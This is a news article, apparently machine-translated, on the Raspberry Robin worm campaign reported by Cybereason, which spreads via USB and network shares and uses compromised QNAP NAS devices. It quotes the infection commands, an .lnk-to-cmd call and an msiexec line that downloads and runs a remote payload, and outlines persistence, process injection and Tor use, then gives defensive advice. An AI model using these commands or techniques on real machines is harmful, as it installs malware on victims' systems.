Worm infection: Raspberry Robin malware campaign affects Windows and Qnap-NAS

Worm infection: Raspberry Robin malware campaign affects Windows and Qnap-NAS

Researchers from the IT security company Cybereason have discovered a malware campaign with a computer worm affecting Windows and Qnap network storage devices. It is part of the malware campaign called Raspberry Robin, but the malware is also known as LNK Worm.

Raspberry Robin contains a worm that spreads through USB devices or network shares. He uses compromised Qnap NAS devices as a springboard. The old but still effective method of lurking for victims with LNK shortcut files is used.

The Raspberry Robin infection starts with two files located in the same directory on an external device or network share: an .lnk file containing a Windows command and a .bat file consisting of padding data and two special commands.

In the specific example, the .lnk file contains the call C:WindowsSystem32cmd.exe" /r tYPE xPhfK.Usb|CmDwhile the file xPhfK.Usb two commands in addition to random binary data explorer.exe ADATA uFD and mSIExEC /Q -I"hTTP://<Adresse>:8080/<Verzeichnis>/USER-PC?admin" to download and run the malware.

The one already present on the computer msiexec-Installer (so-called “Living of the Land”, LOL) is designed to download and run a malicious DLL library from a compromised Qnap NAS device. To complicate detection, Raspberry Robin uses process injection into three legitimate Windows processes and communicates with the command and control servers through the anonymizing Tor network.

The malware achieves persistence by creating a registry key that the DLL file uses rundll32.exe loads and runs at system startup. In the case examined, the library imitates an Apache DLL named libapriconv-1.dll, so as not to arouse suspicion. According to Cybereason, other infections also used a disguise as QT 5.

Antivirus software can be used to protect against malware. Cybereason provides further information on how to prevent an infestation or what to do after an infestation. IT managers should block outgoing connections to Tor-related addresses, since Raspberry Robin is actively communicating with Tor exit nodes.

If an infection does occur, the affected machines should be reinstalled with an image, since the malware takes root and uses hiding mechanisms on infected systems. Cybereason’s announcement contains further details.

GCC Rust: GNU Compiler Collection Steering Committee says yes to new frontend Previous post GCC Rust: GNU Compiler Collection Steering Committee says yes to new frontend
Online workshop: Protecting iOS apps against hackers Next post Online workshop: Protecting iOS apps against hackers